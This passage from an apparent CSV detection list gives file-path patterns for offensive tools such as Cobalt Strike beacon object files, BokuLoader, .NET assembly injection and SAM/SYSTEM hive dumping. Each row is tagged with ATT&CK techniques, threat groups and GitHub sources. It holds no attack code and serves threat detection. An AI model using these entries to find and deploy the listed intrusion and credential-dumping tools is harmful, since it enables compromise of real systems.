TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z 
-*/bof.x64.o*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/bof.x86.o*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/bof.x86.o*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/bof/bof.c,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/bof/bof.vcxproj*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z 
-*/bof/IABOF*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*/bof/IAStart.asm*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*/BOF-Builder*,offensive_tool_keyword,cobaltstrike,C# .Net 5.0 project to build BOF (Beacon Object Files) in mass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ceramicskate0/BOF-Builder,1,1,N/A,10,10,23,3,2023-07-25T22:19:27Z,2021-09-07T01:28:11Z -*/bof-collection/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,1,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*/bofhound.git*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/BOFMask.git*,offensive_tool_keyword,BOFMask,BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF),T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/passthehashbrowns/BOFMask,1,1,N/A,10,1,94,24,2023-06-28T14:35:32Z,2023-06-27T21:19:22Z -*/bofmask.h*,offensive_tool_keyword,BOFMask,BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF),T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/passthehashbrowns/BOFMask,1,1,N/A,10,1,94,24,2023-06-28T14:35:32Z,2023-06-27T21:19:22Z -*/BOFNETExamples/*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*/BOF-RegSave*,offensive_tool_keyword,cobaltstrike,Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/BOF-RegSave,1,1,N/A,10,10,171,29,2020-10-08T17:29:02Z,2020-10-07T13:46:03Z -*/BofRunner.cs*,offensive_tool_keyword,cobaltstrike,A tool to run object files mainly beacon object files (BOF) in .Net.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/BOFs.git*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOFs) for shells and lols,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/BOFs,1,1,N/A,10,10,104,12,2021-09-14T09:03:58Z,2021-08-27T10:04:12Z -*/bof-vs-template/*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/bof-vs-template/*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/boko.py*,offensive_tool_keyword,boko,boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored,T1195 - T1078 - T1079 - T1574,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/bashexplode/boko,1,1,N/A,N/A,1,59,12,2021-09-28T22:36:01Z,2020-05-22T21:46:33Z -*/boku7/spawn*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/spawn,1,1,N/A,10,10,407,71,2023-03-08T15:53:44Z,2021-07-17T16:35:59Z -*/boku7/whereami/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/whereami,1,1,N/A,10,10,152,27,2023-03-13T15:56:38Z,2021-08-19T22:32:34Z -*/BokuLoader.c*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*/BokuLoader.h*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*/BokuLoader/*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
